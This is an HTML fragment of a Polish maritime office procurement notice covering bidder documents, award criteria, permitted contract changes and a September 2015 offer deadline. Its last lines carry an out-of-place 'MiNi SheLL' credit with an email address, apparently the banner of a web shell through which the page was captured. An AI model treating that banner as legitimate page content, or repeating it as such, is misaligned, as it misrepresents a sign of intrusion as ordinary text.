<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) dowód wniesienia wadium,
b) sporządzony przez Wykonawcę dokument zawierający Szczegółowy opis sposobu realizacji przedmiotu zamówienia, który będzie stanowił podstawę oceny ofert w oparciu o kryterium wyboru ofert opisane w punkcie 17.2.2 oraz 17.2.3 SIWZ, zawierający w szczególności:
-proponowany zakres badań, ich zdefiniowanie i uzasadnienie;
-opis proponowanych metod badawczych - w opisie musi znaleźć się szczegółowa prezentacja  metod i narzędzi badawczych;
-opis doboru materiałów źródłowych wraz z uzasadnieniem ich zastosowania;
-harmonogram realizacji badania uwzględniający podział zadań pomiędzy członków zespołu badawczego;
-opis sposobu prezentacji danych i wyników badania.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - podejście metodologiczne - 50</li>
<li>3 - organizacja i realizacja badania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty w następującym zakresie:
1.cen brutto realizacji umowy na skutek zmiany obowiązującego podatku od towarów i usług VAT, o ile okoliczności te powodują konieczność zmiany ceny wg obowiązujących stawek podatku VAT, przy czym ceny netto są stałe przez cały okres obowiązywania umowy;
2.terminu realizacji umowy - jeżeli w skutek okoliczności niezależnych od Zamawiającego oraz Wykonawcy, niemożliwych do wcześniejszego przewidzenia, nierealne jest ukończenie realizacji przedmiotu umowy w wyznaczonym terminie;
3.osoby pełniącej podczas realizacji przedmiotu zamówienia funkcję kierownika zespołu, wskazanej przez Wykonawcę w złożonej ofercie, przy czym nowo wskazana osoba musi spełniać wymagania określone w pkt. 5.1.3. SIWZ i uzyskać pozytywną akceptację Zamawiającego. Dla swojej ważności nie wymaga się zawarcia aneksu. 
4.zmiany lub rezygnacji z podwykonawcy na uzasadniony wniosek Wykonawcy, z uwzględnieniem zapisów pkt. 8.3. SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umsl.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pokój nr 22, II p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2015 godzina 10:00, miejsce: Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pokój nr 20- sekretariat, II p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com